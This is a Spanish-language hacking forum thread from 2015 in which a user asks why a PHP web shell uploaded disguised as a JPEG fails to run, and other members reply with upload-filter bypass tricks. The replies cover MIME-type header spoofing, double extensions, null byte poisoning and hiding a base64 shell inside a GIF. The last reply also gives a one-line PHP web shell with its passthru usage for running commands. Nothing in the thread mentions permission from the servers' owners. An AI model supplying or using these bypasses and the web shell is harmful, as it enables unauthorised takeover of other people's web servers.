comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Problema para subir shell

  • 5 Respuestas
  • 1700 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ricky19_77

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Mayo 16, 2015, 01:09:20 am »
hola gente tengo el siguiente problema subo una shell a servidor web con extension jpeg le cambio la extension con live http headers , busco la ruta de la imagen la pongo en el navegador y me tira error osea no me carga la shell creo que algo estoy haciendo mal porque la probe en otra web y me dice lo mismo
« Última modificación: Mayo 16, 2015, 09:56:47 am por Expermicid »

Desconectado S t Ø r M d ∆ r k

  • *
  • Underc0der
  • Mensajes: 74
  • Actividad:
    0%
  • Reputación 0
  • fb.com/cyberoxyde
    • Ver Perfil
    • Mi Blog
    • Email
  • Twitter: @stormdark_
« Respuesta #1 en: Mayo 16, 2015, 02:00:58 am »
Tienes que cambiarle el mime-type, aparte es alreves, subes la shell en php y despues cambias la cabecera mime type a image/jpeg. Si no se puede intenta bypassear el uploader de otra manera, juega con las extensiones asi file.jpeg.php o file.php.jpeg para q veas como funciona el uploader, puedes intentar tambien un null byte poissoning..

saludos.

In my mind where before there was order, today there is only chaØs!

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1914
  • Actividad:
    0%
  • Reputación 15
    • Ver Perfil
« Respuesta #2 en: Mayo 16, 2015, 08:55:54 am »
Haz como dijo storm, si no, recuerda que no todos los uploaders se pueden bypassear.

Saludos.



Desconectado ricky19_77

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #3 en: Mayo 16, 2015, 03:16:59 pm »
en realidad no lo probe en un solo uploader por eso decia si estoy haciendo algo mal tambien meti la shell dentro del codigo fuente de un gif y tampoco me dejo es que veo muchos tutoriales y lo unico que hacen es subir la shell y despues le cambian la extension y listo se ejecuta

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 364
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #4 en: Mayo 16, 2015, 06:02:34 pm »
Proba con un gif que no pese mucho, ami me paso de no poder subir por la imagen y cuando la cambie me dejo, agregale el ; al final y metele la shell en base64 con el
Código: PHP
  1. <? base64_decode(); ?>
obvio , y cuando lo subas editale la cabecera y donde dice Content-Type: le pones image/gif (Recuerda que no todos los uploads son vulnerables!)). Saludos!
« Última modificación: Mayo 17, 2015, 09:49:14 pm por EPSILON »

Desconectado seth

  • *
  • Underc0der
  • Mensajes: 264
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
« Respuesta #5 en: Mayo 17, 2015, 09:43:14 pm »
Tienes que cambiarle el mime-type, aparte es alreves, subes la shell en php y despues cambias la cabecera mime type a image/jpeg.
es lo mismo
hola gente tengo el siguiente problema subo una shell a servidor web con extension jpeg le cambio la extension con live http headers , busco la ruta de la imagen la pongo en el navegador y me tira error osea no me carga la shell creo que algo estoy haciendo mal porque la probe en otra web y me dice lo mismo

no todos los uploaders te dejan subir shell
proba con uno que sepas que es vulnerable, lo mas facil es hacerlo en localhost. podes usar este http://n3t-datagrams.net/docs/?/=15
no se que shell estas usando pero capaz no pasa porque es muy pesada. podes usar <?PHP $_GET['a']($_GET['b']);?> y para ejecutar comandos haces ?a=passthru&b=ls
que error te da?

 

¿Te gustó el post? COMPARTILO!



Crear un archivo .vbs para ejecutar un archivo .bat en invisible

Iniciado por NMS

Respuestas: 2
Vistas: 4957
Último mensaje Marzo 13, 2017, 10:37:57 pm
por sadfud
[SOLUCIONADO] Ayuda para encontrar "airdecrypt"

Iniciado por Typh0n

Respuestas: 2
Vistas: 3995
Último mensaje Enero 13, 2014, 07:11:18 am
por aika
allegro 5,opngl,sdk para fan game modo storyboard game

Iniciado por Mr.Tru

Respuestas: 2
Vistas: 426
Último mensaje Mayo 23, 2018, 01:19:20 pm
por Mr.Tru
Cómo uso la "/" para hacer un select en una tabla

Iniciado por tetano32

Respuestas: 3
Vistas: 1040
Último mensaje Diciembre 20, 2017, 04:41:12 pm
por tetano32
[SOLUCIONADO] Desencriptacion de una imagen para extraer la imagen original

Iniciado por stuxnet13

Respuestas: 3
Vistas: 1364
Último mensaje Enero 07, 2016, 07:55:01 pm
por blackdrake